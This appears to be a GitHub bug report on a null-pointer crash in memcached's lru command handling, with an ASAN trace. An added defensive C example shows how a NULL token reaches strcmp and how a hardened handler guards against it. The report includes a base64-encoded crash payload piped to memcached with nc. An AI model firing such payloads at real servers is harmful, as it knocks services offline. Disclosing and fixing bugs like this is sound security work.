segfault (null pointer dereference) during lru command handling #474

Closed
@stze

Description

Dear memcached team —

I have detected a SIGSEGV during the lru command handling.

Version

bb0980f

How to reproduce

Start memcached:
$ memcached

Send the malicious payload via nc:
$ echo -n "bHJ1IG1vZGUKb7G0AGxydWRl6gdtTk9UXw==" | base64 -d | nc 127.0.0.1 11211

ASAN

AddressSanitizer:DEADLYSIGNAL
=================================================================
==14929==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000000582a7e bp 0x7f6082dfa8d0 sp 0x7f6082dfa780 T4)
==14929==The signal is caused by a READ memory access.
==14929==Hint: address points to the zero page.
    #0 0x582a7d in __wrap_strcmp (/home/stze/Documents/repositories/memcached/memcached+0x582a7d)
    #1 0x547ac4 in process_lru_command /home/stze/Documents/repositories/memcached/memcached.c:4543:13
    #2 0x54055d in process_command /home/stze/Documents/repositories/memcached/memcached.c:4920:9
    #3 0x53b30c in try_read_command /home/stze/Documents/repositories/memcached/memcached.c:5064:9
    #4 0x52a48e in drive_machine /home/stze/Documents/repositories/memcached/memcached.c:5500:17
    #5 0x52c76a in event_handler /home/stze/Documents/repositories/memcached/memcached.c:5782:5
    #6 0x7f6088099030  (/lib64/libevent-2.1.so.6+0x24030)
    #7 0x7f60880997c6 in event_base_loop (/lib64/libevent-2.1.so.6+0x247c6)
    #8 0x56f7ff in worker_libevent /home/stze/Documents/repositories/memcached/thread.c:387:5
    #9 0x7f608805b58d in start_thread (/lib64/libpthread.so.0+0x858d)
    #10 0x7f6087dd9682 in __GI___clone (/lib64/libc.so.6+0xfd682)

Please let me know what additional information I can provide to successfully reproduce the issue.
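The ASAN trace above shows a READ of address 0 inside strcmp() called from process_lru_command, i.e. a NULL string pointer reached strcmp(). The following is an added, self-contained C example (not memcached's code, and the token-count logic is an assumption about the failure class, not a reading of the real fix) that models the classic way this happens in a line-protocol tokenizer: the token array ends with a terminator whose value is NULL and whose slot is counted in ntokens, so a check like `ntokens >= 3` for "lru mode <arg>" still lets "lru mode" through and hands tokens[2].value == NULL to strcmp(). The hardened handler validates the count and every pointer before any string comparison and answers with a bad-format code instead. All names (tokenize, lru_mode_checked, run_lru_line) and the sample command lines are constructed for this example.

```c
#include <stdio.h>
#include <string.h>

#define MAX_TOKENS 8

typedef struct {
    char *value;    /* NULL in the terminator slot */
    size_t length;
} token_t;

static int is_sep(char c) { return c == ' ' || c == '\r' || c == '\n'; }

/* Split a command line in place on whitespace. Like many line-protocol
 * tokenizers, the final slot is a terminator with value == NULL, and the
 * returned count INCLUDES that terminator. That convention is what makes an
 * off-by-one in a later ">= N" check hand a NULL pointer to strcmp(). */
static size_t tokenize(char *line, token_t *tokens, size_t max_tokens) {
    size_t n = 0;
    char *s = line;
    while (n < max_tokens - 1) {
        while (is_sep(*s)) s++;
        if (*s == '\0') break;
        tokens[n].value = s;
        while (*s && !is_sep(*s)) s++;
        tokens[n].length = (size_t)(s - tokens[n].value);
        n++;
        if (*s == '\0') break;
        *s++ = '\0';
    }
    tokens[n].value = NULL;   /* terminator slot */
    tokens[n].length = 0;
    return n + 1;
}

/* Result codes for the hypothetical "lru mode <flat|segmented>" handler. */
enum lru_result { LRU_BAD_FORMAT = -1, LRU_FLAT = 0, LRU_SEGMENTED = 1, LRU_UNKNOWN = 2 };

/* Hardened handler. "lru mode" alone tokenizes to ntokens == 3 with
 * tokens[2].value == NULL, so the argument slot is only trusted when
 * ntokens >= 4 AND the pointer itself is non-NULL. Both checks run before
 * strcmp() ever sees the pointer. */
static enum lru_result lru_mode_checked(const token_t *tokens, size_t ntokens) {
    if (ntokens < 4 || tokens[1].value == NULL || tokens[2].value == NULL)
        return LRU_BAD_FORMAT;                 /* reply CLIENT_ERROR instead of crashing */
    if (strcmp(tokens[1].value, "mode") != 0) return LRU_BAD_FORMAT;
    if (strcmp(tokens[2].value, "flat") == 0) return LRU_FLAT;
    if (strcmp(tokens[2].value, "segmented") == 0) return LRU_SEGMENTED;
    return LRU_UNKNOWN;
}

/* Run one constructed command line through tokenizer + handler. */
static enum lru_result run_lru_line(const char *line) {
    char buf[256];
    token_t tokens[MAX_TOKENS];
    snprintf(buf, sizeof buf, "%s", line);
    size_t n = tokenize(buf, tokens, MAX_TOKENS);
    if (n < 2 || tokens[0].value == NULL || strcmp(tokens[0].value, "lru") != 0)
        return LRU_BAD_FORMAT;
    return lru_mode_checked(tokens, n);
}

/* Token count (including the NULL terminator) for a constructed line. */
static size_t count_tokens(const char *line) {
    char buf[256];
    token_t tokens[MAX_TOKENS];
    snprintf(buf, sizeof buf, "%s", line);
    return tokenize(buf, tokens, MAX_TOKENS);
}

int main(void) {
    /* Constructed inputs: the truncated form mirrors the "lru mode\n" prefix
     * of the reported payload; the others are well-formed commands. */
    const char *lines[] = { "lru mode\n", "lru mode flat\n", "lru mode segmented\n", "lru\n" };
    for (size_t i = 0; i < sizeof lines / sizeof lines[0]; i++)
        printf("%-22s -> ntokens=%zu result=%d\n", lines[i],
               count_tokens(lines[i]), (int)run_lru_line(lines[i]));
    return 0;
}
```

The detection angle for this class of bug is the same as the report's: build with -fsanitize=address and fuzz the text protocol with truncated argument lists; a "SEGV on unknown address 0x000000000000 ... READ" in a libc string routine called from a command handler is the signature of a NULL token reaching strcmp()/strlen().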
